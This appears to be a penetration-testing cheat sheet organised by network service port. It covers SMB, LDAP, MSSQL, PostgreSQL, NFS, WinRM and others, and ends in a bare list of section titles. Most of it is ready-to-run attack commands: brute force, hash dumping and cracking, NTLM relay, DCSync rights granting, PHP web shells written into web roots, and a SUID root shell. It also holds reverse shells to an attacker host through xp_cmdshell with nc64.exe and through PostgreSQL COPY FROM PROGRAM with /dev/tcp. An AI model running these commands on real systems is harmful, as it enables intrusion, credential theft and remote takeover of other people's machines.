Most modern Windows hosts expose both — check 445 (SMB) for richer attack surface
<20> in nmblookup output indicates File Server service is running

(161) SNMP

SNMP community string brute force, OID enumeration, and dangerous configuration review.

Enumeration

sudo nmap -sU -sV -p161 --script snmp-* <TARGET>

Community String Brute Force

onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET>

OID Walk (once you have a community string)

snmpwalk -v2c -c <COMMUNITY_STRING> <TARGET>

Brute force OIDs

braa <COMMUNITY_STRING>@<TARGET>:.1.3.6*

Config File

cat /etc/snmp/snmpd.conf | grep -v "#" | sed -r '/^\s*$/d'

Dangerous Setting	Description
`rwuser noauth`	Full OID tree access with no auth
`rwcommunity <string> <IP>`	Read/write community string from any source

(389) LDAP

LDAP enumeration, anonymous bind, NXC domain queries, and bloodyAD operations.

Enumeration

sudo nmap -sV -p389,636,3268,3269 --script ldap-* <TARGET>

NXC LDAP module

nxc ldap <TARGET> -u '' -p ''
nxc ldap <TARGET> -u <USER> -p '<PASS>'

Anonymous Bind

Test for unauthenticated access

ldapsearch -x -H ldap://<TARGET> -b "DC=<DOMAIN>,DC=<TLD>" "(objectClass=*)"

Enumerate users anonymously

ldapsearch -x -H ldap://<TARGET> -b "DC=<DOMAIN>,DC=<TLD>" "(objectClass=person)" sAMAccountName

Authenticated Enumeration

ldapsearch -x -H ldap://<TARGET> -D "<USER>@<DOMAIN>" -w '<PASS>' -b "DC=<DOMAIN>,DC=<TLD>" "(objectClass=*)"

Dump all users

nxc ldap <TARGET> -u <USER> -p '<PASS>' --users

Dump all groups

nxc ldap <TARGET> -u <USER> -p '<PASS>' --groups

Password policy

nxc ldap <TARGET> -u <USER> -p '<PASS>' --pass-pol

ASREPRoastable users

nxc ldap <TARGET> -u <USER> -p '<PASS>' --asreproast output.txt

Kerberoastable users

nxc ldap <TARGET> -u <USER> -p '<PASS>' --kerberoasting output.txt

bloodyAD

Enumerate domain info

bloodyAD --host <TARGET> -d <DOMAIN> -u <USER> -p '<PASS>' get dnsDump

Get all users

bloodyAD --host <TARGET> -d <DOMAIN> -u <USER> -p '<PASS>' get object "DC=<DOMAIN>,DC=<TLD>" --attr member

Change a user’s password (requires GenericAll/ForceChangePassword)

bloodyAD --host <TARGET> -d <DOMAIN> -u <USER> -p '<PASS>' set password <TARGET_USER> 'NewPass123!'

Add user to a group (requires GenericWrite/AddMember)

bloodyAD --host <TARGET> -d <DOMAIN> -u <USER> -p '<PASS>' add groupMember <GROUP> <USER_TO_ADD>

Grant DCSync rights (requires WriteOwner/WriteDACL on domain object)

bloodyAD --host <TARGET> -d <DOMAIN> -u <USER> -p '<PASS>' add dcsync <USER>

LDAP over SSL (636)

ldapsearch -x -H ldaps://<TARGET>:636 -D "<USER>@<DOMAIN>" -w '<PASS>' -b "DC=<DOMAIN>,DC=<TLD>" "(objectClass=*)"

Config File

cat /etc/ldap/ldap.conf

(445) SMB

SMB enumeration, share access, mounting, brute force, execution, and NTLM relay.

Enumeration

Null session share listing

smbclient -N -L \\\\<TARGET>

NXC — enumerate shares with credentials

nxc smb <TARGET> -u <USER> -p '<PASS>' --shares

NXC — enumerate shares anonymously

nxc smb <TARGET> -u '' -p '' --shares

SMBMap — list shares

smbmap -H <TARGET>

SMBMap — list shares with credentials

smbmap -d <DOMAIN> -u <USER> -p '<PASS>' -H <TARGET>

Connecting and Browsing

Connect to a share anonymously

smbclient \\\\<TARGET>\\<SHARE>

Connect with credentials

smbclient \\\\<TARGET>\\<SHARE> -U <USER>

Recursively download all files from a share

smb: \> recurse on
smb: \> prompt off
smb: \> mget *

Recursive directory listing with SMBMap

smbmap -d <DOMAIN> -u <USER> -p '<PASS>' -H <TARGET> -R <SHARE>

Mounting

Linux

sudo mount -t cifs -o username=<USER>,password=<PASS>,domain=<DOMAIN> //<TARGET>/<SHARE> /mnt

Windows — CMD

net use n: \\<TARGET>\<SHARE> /user:<USER> <PASS>

Windows — PowerShell

$cred = New-Object System.Management.Automation.PSCredential('<USER>', (ConvertTo-SecureString '<PASS>' -AsPlainText -Force))
New-PSDrive -Name "N" -Root "\\<TARGET>\<SHARE>" -PSProvider "FileSystem" -Credential $cred

Searching Mounted Shares

Linux

find /mnt -name '*cred*'
grep -rn /mnt/ -ie cred

Windows — CMD

dir n:\*cred* /s /b
findstr /s /i cred n:\*.*

Windows — PowerShell

Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List

Brute Force

nxc smb <TARGET> -u <USER_LIST> -p '<PASS>'

Execution

psexec — SYSTEM shell

psexec.py <DOMAIN>/<USER>:'<PASS>'@<TARGET>

wmiexec — fewer logs

wmiexec.py <DOMAIN>/<USER>:'<PASS>'@<TARGET>

NTLM Relay

Disable SMB in /etc/responder/Responder.conf, then relay captured hashes to a target

impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET>

Execute a command on relay

impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET> -c '<COMMAND>'

(512-514) R-Services

R-services enumeration, rlogin access, rwho/rusers, and hosts.equiv abuse.

Ports

Port	Service	Description
512	rexec	Remote command execution with password
513	rlogin	Remote login (no password if trusted)
514	rsh/rcp	Remote shell / remote copy

Enumeration

sudo nmap -sV -p512,513,514 <TARGET>

List logged-in users on remote host

rwho <TARGET>
rusers -l <TARGET>

rlogin <TARGET>

rlogin -l <USER> <TARGET>

If the target’s /etc/hosts.equiv or ~/.rhosts trusts your host, no password is required.

rsh — Remote Shell

Execute command without interactive shell

rsh <TARGET> <COMMAND>
rsh -l <USER> <TARGET> <COMMAND>

rcp — Remote Copy

Copy file from remote to local

rcp <USER>@<TARGET>:/path/to/file /local/path/

Copy file from local to remote

rcp /local/file <USER>@<TARGET>:/remote/path/

Trust File Abuse

/etc/hosts.equiv — system-wide trust (grants passwordless access to all users)

<ATTACKER_IP>
+ +

~/.rhosts — per-user trust

<ATTACKER_IP> <LOCAL_USER>
+ +

+ + entries allow any host and any user — check both files if you have read access.

Config Files

cat /etc/hosts.equiv
cat ~/.rhosts

(623) IPMI

IPMI version detection, RAKP hash dumping, and hash cracking for BMC access.

Enumeration

sudo nmap -sU --script ipmi-version -p623 <TARGET>

Metasploit version scan

use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <TARGET>
run

Dump IPMI Hashes (RAKP flaw in IPMI 2.0)

The RAKP protocol reveals a salted hash of any valid user’s password before authentication. Works against any valid account on the BMC.

use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <TARGET>
run

Crack Hashes

hashcat -m 7300 ipmi_hashes.txt /usr/share/wordlists/rockyou.txt

Default Credentials

Vendor	Username	Password
Dell iDRAC	root	calvin
HP iLO	Administrator	(random, printed on tag)
Supermicro	ADMIN	ADMIN

(873) Rsync

Rsync share enumeration, anonymous access, file download, and upload for persistence.

Enumeration

sudo nmap -sV -p873 --script rsync-list-modules <TARGET>

List available modules (shares)

rsync rsync://<TARGET>/

List contents of a module

rsync rsync://<TARGET>/<MODULE>/

Anonymous Access

Download all files from a share

rsync -av rsync://<TARGET>/<MODULE>/ ./loot/

Authenticated Access

rsync -av rsync://<USER>@<TARGET>/<MODULE>/ ./loot/

With password via environment variable

RSYNC_PASSWORD='<PASS>' rsync -av rsync://<USER>@<TARGET>/<MODULE>/ ./loot/

Upload Files

Upload a file to a writable share

rsync -av /local/file rsync://<TARGET>/<MODULE>/

If the share maps to a web directory or cron path, uploading a shell or script may lead to code execution.

Check Write Access

Upload a test file and verify

touch /tmp/test.txt
rsync /tmp/test.txt rsync://<TARGET>/<MODULE>/

Notes

Module names map to server-defined paths in /etc/rsyncd.conf
Check for auth users, secrets file, and read only = false in config

(1433) MSSQL

MSSQL enumeration, authentication, xp_cmdshell command execution, and shell access.

Enumeration

sudo nmap -sV -p1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-config,ms-sql-ntlm-info <TARGET>

Metasploit ping scan

use auxiliary/scanner/mssql/mssql_ping
set RHOSTS <TARGET>
run

Connect

Windows auth (domain account)

mssqlclient.py <DOMAIN>/<USER>@<TARGET> -windows-auth

SQL auth (sa or local account)

mssqlclient.py <USER>@<TARGET>

NXC MSSQL

nxc mssql <TARGET> -u <USER> -p '<PASS>' -d <DOMAIN>

Enumeration Queries

SELECT is_srvrolemember('sysadmin');   -- 1 = sysadmin
SELECT name FROM master.dbo.sysdatabases;
SELECT table_name FROM <DB>.INFORMATION_SCHEMA.TABLES;
SELECT * FROM <DB>.[dbo].<TABLE>;

Enable and Use xp_cmdshell

Check if enabled

EXEC xp_cmdshell 'net user';

Enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Reverse Shell via xp_cmdshell

Serve nc64.exe from attacker, catch a shell

EXEC xp_cmdshell 'powershell -c wget http://<ATTACKER_IP>/nc64.exe -outfile C:\Windows\Temp\nc64.exe';
EXEC xp_cmdshell 'C:\Windows\Temp\nc64.exe -e cmd.exe <ATTACKER_IP> 443';

Dangerous Settings

MSSQL clients connecting without encryption
sa account with blank or default password
xp_cmdshell enabled

(1521) Oracle TNS

Oracle TNS SID brute force, sqlplus connection, ODAT exploitation, and hash extraction.

Enumeration

sudo nmap -sV -p1521 --script oracle-tns-version,oracle-sid-brute <TARGET>

SID Enumeration

Brute force valid SIDs (required before connecting)

odat sidguesser -s <TARGET>

Common default SIDs: XE, ORCL, DB, PROD

Nmap SID brute

sudo nmap -sV -p1521 --script oracle-sid-brute <TARGET>

Connect with sqlplus

sqlplus <USER>/<PASS>@<TARGET>/<SID>

As SYSDBA

sqlplus <USER>/<PASS>@<TARGET>/<SID> as sysdba

Enumeration Queries

SELECT * FROM V$VERSION;
SELECT username FROM dba_users;
SELECT table_name FROM dba_tables;
SELECT name, password FROM sys.user$ WHERE type# = 1;

Privilege Checks

SELECT * FROM session_privs;
SELECT * FROM dba_role_privs WHERE grantee = '<USER>';

ODAT — Oracle Database Attack Tool

Full audit

odat all -s <TARGET> -d <SID>

Password guessing

odat passwordguesser -s <TARGET> -d <SID>

File read via UTL_FILE

odat utlfile -s <TARGET> -d <SID> -U <USER> -P '<PASS>' --getFile /etc/passwd /tmp/passwd.txt

File write

odat utlfile -s <TARGET> -d <SID> -U <USER> -P '<PASS>' --putFile /tmp shell.php shell.php

Execute OS command (requires Java or external proc)

odat externaltable -s <TARGET> -d <SID> -U <USER> -P '<PASS>' --exec /bin/bash id

Hash Extraction and Cracking

Dump hashes (requires DBA access)

SELECT name, password, spare4 FROM sys.user$;

Oracle hash types for hashcat

Hash Format	Mode
Oracle H (pre-11g)	`hashcat -m 3100`
Oracle S (11g+)	`hashcat -m 112`
Oracle T (12c+)	`hashcat -m 12300`

Config File

cat $ORACLE_HOME/network/admin/tnsnames.ora
cat $ORACLE_HOME/network/admin/listener.ora

(2049) NFS

NFS share enumeration, mounting, permission inspection, and no_root_squash exploitation.

Enumeration

List exported shares

showmount -e <TARGET>

Nmap NFS scripts

sudo nmap -sV -p111,2049 --script nfs* <TARGET>

sudo mount -t nfs <TARGET>:<SHARE_PATH> /mnt

View contents with permissions

ls -la /mnt

List with UIDs and GIDs (useful to identify ownership)

ls -n /mnt

Unmount

sudo umount /mnt

no_root_squash Exploitation

If the export has no_root_squash set, files created as root on the client retain UID 0 on the server. This allows placing a SUID binary on the share.

Create a SUID shell on the mounted share (run as root on attacker)

cp /bin/bash /mnt/bash
chmod +s /mnt/bash

Execute on the target (as any user)

/path/to/share/bash -p

Config File

cat /etc/exports

Dangerous Setting	Description
`no_root_squash`	Root on client = root on server
`rw`	Share is writable
`insecure`	Allows ports above 1024

(3306) MySQL

MySQL connection, database and user enumeration, and credential discovery.

Enumeration

sudo nmap -sV -p3306 --script mysql-* <TARGET>

Connect

mysql -h <TARGET> -u <USER> -p

With password inline (avoid in production — logs to history)

mysql -h <TARGET> -u <USER> -p'<PASS>'

Enumeration Queries

SELECT version();
SELECT user();
SELECT database();
SHOW DATABASES;
USE <DATABASE>;
SHOW TABLES;
SHOW COLUMNS FROM <TABLE>;
SELECT user, host, authentication_string FROM mysql.user;
SHOW GRANTS FOR '<USER>'@'<HOST>';

Dump Users and Hashes

SELECT user, host, authentication_string FROM mysql.user;

Crack with hashcat

hashcat -m 3200 mysql_hashes.txt /usr/share/wordlists/rockyou.txt

Read Files (if FILE privilege)

SELECT LOAD_FILE('/etc/passwd');

Write files (if writable path)

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

Config Locations

/etc/mysql/my.cnf
/etc/my.cnf
/etc/mysql/mysql.conf.d/mysqld.cnf

(3389) RDP

RDP enumeration, credential testing, pass-the-hash, and vulnerability checks.

Enumeration

sudo nmap -sV -p3389 --script rdp-* <TARGET>

Connect

xfreerdp /v:<TARGET> /u:<USER> /p:'<PASS>' /cert:ignore

With domain

xfreerdp /v:<TARGET> /d:<DOMAIN> /u:<USER> /p:'<PASS>' /cert:ignore

Pass-the-Hash (requires Restricted Admin Mode enabled)

xfreerdp /v:<TARGET> /u:<USER> /pth:<NTLM_HASH> /cert:ignore

NXC Screenshot (NLA disabled)

nxc rdp <TARGET> --nla-screenshot

Screenshot with valid credentials

nxc rdp <TARGET> -u <USER> -p '<PASS>' --screenshot --screentime 5 --res 1280x720

Vulnerability Checks

BlueKeep (CVE-2019-0708) — Windows 7/2008

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <TARGET>
run

MS12-020

nmap -p3389 --script rdp-vuln-ms12-020 <TARGET>

Enable RDP (if you have admin shell)

# CMD
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Enable via NXC

nxc smb <TARGET> -u <USER> -p '<PASS>' -M rdp -o ACTION=enable

(5432) PostgreSQL

PostgreSQL connection, enumeration, file read/write via COPY, and command execution.

Enumeration

sudo nmap -sV -p5432 --script pgsql-brute <TARGET>

Connect

psql -h <TARGET> -U <USER> -d <DATABASE>

With password prompt

PGPASSWORD='<PASS>' psql -h <TARGET> -U <USER> -d <DATABASE>

Common default databases: postgres, template1

Enumeration Queries

SELECT version();
SELECT current_user;
SELECT current_database();
\l                          -- list databases
\c <DATABASE>               -- switch database
\dt                         -- list tables
\du                         -- list roles/users
SELECT usename, passwd FROM pg_shadow;

File Read (COPY)

Read a file into a table

CREATE TABLE tmp_read (data TEXT);
COPY tmp_read FROM '/etc/passwd';
SELECT * FROM tmp_read;
DROP TABLE tmp_read;

File Write (COPY TO)

Requires write permission on the target path

COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';

Command Execution (COPY FROM PROGRAM)

PostgreSQL ≥ 9.3 — requires superuser

COPY cmd_exec FROM PROGRAM 'id';

Reverse shell

COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/<ATTACKER>/<PORT> 0>&1"';

Check Superuser

SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = current_user;

Config File

cat /etc/postgresql/*/main/pg_hba.conf

Entry	Description
`trust`	No password required
`md5`	MD5 password hash
`peer`	OS user must match DB user

(5985) WinRM

WinRM authentication testing, pass-the-hash, command execution, and file transfer.

Enumeration

sudo nmap -sV -p5985,5986 <TARGET>
nxc winrm <TARGET>

Test Credentials

nxc winrm <TARGET> -u <USER> -p '<PASS>'

Pass-the-Hash

nxc winrm <TARGET> -u <USER> -H <NTLM_HASH>

Connect — Evil-WinRM

Password

evil-winrm -i <TARGET> -u <USER> -p '<PASS>'

Pass-the-Hash

evil-winrm -i <TARGET> -u <USER> -H <NTLM_HASH>

With SSL (port 5986)

evil-winrm -i <TARGET> -u <USER> -p '<PASS>' -S

Command Execution via NXC

CMD

nxc winrm <TARGET> -u <USER> -p '<PASS>' -x "<COMMAND>"

PowerShell

nxc winrm <TARGET> -u <USER> -p '<PASS>' -X "<PS_COMMAND>"

File Transfer (Evil-WinRM)

Upload

*Evil-WinRM* PS> upload /local/tool.exe C:\Windows\Temp\tool.exe

Download

*Evil-WinRM* PS> download C:\Windows\Temp\file.txt /local/file.txt

Load PowerShell Scripts

Pass a scripts directory at connect time — scripts are available by name in the session

evil-winrm -i <TARGET> -u <USER> -p '<PASS>' -s /opt/scripts/

Working Methodology

Host Enumeration

Network Discovery

TCP Scanning

UDP Scanning

Fingerprinting

NFS

File Transfer

Serving Files

Download to Linux

Download to Windows

Upload from Linux

Upload from Windows

Base64

HTTP (80/443)

Nmap Web Scripts

Fingerprinting

Directory Brute Force

Virtual Host / Subdomain Brute

Extension Brute

Nikto

Technology Identification Clues

Source Inspection

Common Sensitive Paths

BloodHound

Starting BloodHound CE

Resetting BloodHound CE

Web Enumeration

Fingerprinting

Manual Checks

Sensitive File Checks

Directory & File Enumeration

VHost & Subdomain Enumeration

DNS Enumeration

Login Portals

Input Testing

Wordlists

Standard Paths

Custom Wordlists

Policy Filtering

bloodhound.py

Installation

Collection

WordPress

Discovery

Fingerprinting

WPScan Enumeration

Login Brute Force

RCE via Theme Editor

Vulnerable Plugins

Cred Hunting — Linux

Automated Tools

SSH Keys

Config Files & Credentials

Shell History

User Home Directories

Hash Hunting

Memory & Sessions

Google Dorks

Operators

Login Panels

Exposed Files

Infrastructure Exposure

Subdomains and Related Sites

Cloud Storage

OSINT

Technology Fingerprinting

Joomla

Discovery

Fingerprinting

JoomScan

Droopescan

Version Discovery

Default Admin Path

Login Brute Force

RCE via Template Editor (Admin Required)

Vulnerable Extensions

Config File (if system access)

BloodyAD

Installation